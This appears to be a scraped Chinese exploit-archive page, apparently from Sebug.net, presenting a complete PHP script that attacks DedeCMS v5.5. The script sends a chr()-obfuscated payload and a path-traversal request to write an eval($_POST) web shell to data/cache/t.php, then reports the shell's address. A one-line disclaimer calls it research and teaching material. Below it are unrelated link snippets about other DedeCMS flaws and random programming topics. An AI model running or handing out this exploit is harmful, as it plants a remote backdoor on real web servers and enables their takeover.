测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. <?php
    2. print_r('
    3. +----------------------------------------+
    4. dedecms v5.5 final getwebshell exploit
    5. +----------------------------------------+
    6. ');
    7. if($argc <3){
    8. print_r('
    9. +----------------------------------------+
    10. Usage: php '.$argv[0].' host path
    11. host: target server (ip/hostname)
    12. path: path to dedecms
    13. Example:
    14. php '.$argv[0].' localhost /dedecms/
    15. +----------------------------------------+
    16. ');
    17. exit;
    18. }
    19. error_reporting(7);
    20. ini_set('max_execution_time',0);
    21. $host = $argv[1];
    22. $path = $argv[2];
    23. $post_a ='plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*';
    24. $post_b ='needCode=aa/../../../data/mysql_error_trace';
    25. $shell ='data/cache/t.php';
    26. get_send($post_a);
    27. post_send('plus/comments_frame.php',$post_b);
    28. $content = post_send($shell,'t=echo tojen;');
    29. if(substr($content,9,3)=='200'){
    30. echo "\nShell Address is:".$host.$path.$shell;
    31. }else{
    32. echo "\nError.";
    33. }
    34. function get_send($url){
    35. global $host, $path;
    36. $message ="GET ".$path."$url HTTP/1.1\r\n";
    37. $message .="Accept: */*\r\n";
    38. $message .="Referer: http://$host$path\r\n";
    39. $message .="Accept-Language: zh-cn\r\n";
    40. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    41. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    42. $message .="Host: $host\r\n";
    43. $message .="Connection: Close\r\n\r\n";
    44. $fp = fsockopen($host,80);
    45. if(!$fp){
    46. echo "\nConnect to host Error";
    47. }
    48. fputs($fp, $message);
    49. $back ='';
    50. while(!feof($fp))
    51. $back .= fread($fp,1024);
    52. fclose($fp);
    53. return $back;
    54. }
    55. function post_send($url,$cmd){
    56. global $host, $path;
    57. $message ="POST ".$path."$url HTTP/1.1\r\n";
    58. $message .="Accept: */*\r\n";
    59. $message .="Referer: http://$host$path\r\n";
    60. $message .="Accept-Language: zh-cn\r\n";
    61. $message .="Content-Type: application/x-www-form-urlencoded\r\n";
    62. $message .="User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    63. $message .="Host: $host\r\n";
    64. $message .="Content-Length: ".strlen($cmd)."\r\n";
    65. $message .="Connection: Close\r\n\r\n";
    66. $message .= $cmd;
    67. $fp = fsockopen($host,80);
    68. if(!$fp){
    69. echo "\nConnect to host Error";
    70. }
    71. fputs($fp, $message);
    72. $back ='';
    73. while(!feof($fp))
    74. $back .= fread($fp,1024);
    75. fclose($fp);
    76. return $back;
    77. }
    78. ?>

dedecms v5.5 final getwebshell exploit(datalistcp.class.php)的更多相关文章

  1. Dedecms <= V5.6 Final模板执行漏洞

    漏洞版本: Dedecms V5.6 Final 漏洞描述: Dedecms V5.6 Final版本中的各个文件存在一系列问题,经过精心构造的含有恶意代表的模板内容可以通过用户后台的上传附件的功能上 ...

  2. DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞

    漏洞版本: DedeCms V5.6 漏洞描述: DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板.网站升级转移均提供很大的便利,健壮的模板标签为 ...

  3. 为dedecms v5.7的ckeditor添加jwplayer插件

    dedecms v5.7的默认编辑器是ckeditor,不过用的是php版本的,默认的工具栏不在config.js里面配置,而是在ckeditor.inc.php里面配置,默认的工具栏是$toolba ...

  4. Dedecms v5.7包含上传漏洞利用

    Title:Dedecms v5.7包含上传漏洞利用 --2012-09-21 10:16 注册,登录,免邮箱验证. up.htm ---------------------------------- ...

  5. 织梦DedeCMS v5.7 实现导航条下拉菜单

    首先将下面这段代码贴到templets\default\footer.htm文件里(只要在此文件里就行,位置无所谓) <</span>script type='text/javasc ...

  6. CVE-2018-20129:DedeCMS V5.7 SP2前台文件上传漏洞

    一.漏洞摘要 漏洞名称: DedeCMS V5.7 SP2前台文件上传漏洞上报日期: 2018-12-11漏洞发现者: 陈灿华产品首页: http://www.dedecms.com/软件链接: ht ...

  7. DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129)

    DedeCMS V5.7 SP2前台文件上传漏洞(CVE-2018-20129) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2版本中的 ...

  8. DedeCMS V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221)

    dedeCMS  V5.7 SP2后台代码执行漏洞复现(CNVD-2018-01221) 一.漏洞描述 织梦内容管理系统(Dedecms)是一款PHP开源网站管理系统.Dedecms V5.7 SP2 ...

  9. DeDeCMS v5.7 漏洞复现

    DedeCMS V5.7 漏洞复现 XSS漏洞 首先我们在首页要进行用户的注册以及登录 这里我们已经提前注册过了,登录即可 普通用户账号密码:root/passwd 管理员账号密码:admin/pik ...

随机推荐

  1. lr11 controller打开提示cannot initialize driver dll,exiting

    解决:在win7要以管理员身份运行才行的 问题2:在使用loadrunner时,从vuser generator启动controller的时候可能出现:由于另一个程序正在运行中 此操作无法完成.请选择 ...

  2. gVim 启动时窗口自动居中

    最近折腾 vim, 除了配置巨麻烦外, 另一个很蛋疼的就是窗口位置问题了, 折腾了半天无法启动时自动居中, 找遍各地也只有保存上次位置, 下次启动时恢复的方法 废话不多说, 直接上代码, 丢到 vim ...

  3. BZOJ1878 [SDOI2009] HH的项链 [莫队,卡常]

    BZOJ传送门,洛谷传送门 HH的项链 Description HH有一串由各种漂亮的贝壳组成的项链.HH相信不同的贝壳会带来好运,所以每次散步 完后,他都会随意取出一 段贝壳,思考它们所表达的含义. ...

  4. springMVC接受对象集合,name数组

    这两天开发遇到一个很常见的问题,即使自己一直没遇见过,不过之前看过是实现接受对象集合的代码,只不过没注意罢了 推荐一篇文章 直接贴代码吧 public class Person { private S ...

  5. 简单了解Linux的inode与block

    Linux常见文件系统类型:ext3(CentOS5),ext4(CentOS6),xfs(CentOS7) Windows常见文件系统类型:FAT32,NTFS (1).inode的内容 1)ino ...

  6. Can you find it? HDU - 2141 (二分查找)

    Give you three sequences of numbers A, B, C, then we give you a number X. Now you need to calculate ...

  7. python虚拟环境virtualenv下安装MySQL-python

    1.先在windows安装:https://github.com/konglingxi/mysqldb_for_python27 2.按照提示将python主环境中的mysqldb相关文件及文件夹移到 ...

  8. 高并发编程之ReentrantLock

    上文学习jvm提供的同步方法synchronized的用法,一些常见的业务类型以及一道以前阿里的面试题,从中学习到了一些并发编程的一些规则以及建议,本文主要学习jdk提供的同步方法reentrantL ...

  9. [BZOJ 3720][JZYZOJ 2016]gty的妹子树 强制在线 树分块/树套树

    jzyzoj的p2016 先码着,强制在线的树分块或者树套树?关键是我树分块还在入门阶段树套树完全不会啊摔   http://blog.csdn.net/jiangyuze831/article/de ...

  10. 【最小表示法】BZOJ1398-寻找朋友

    [题目大意] 判断两个字符串是否循环同构. [思路] 我一开始的做法是直接同时在两个字符串上求最小表示法,只有部分测试点能过,理由未知,以后再来思考. 现在做法:分别求出两个字符串的最小表示法,再比较 ...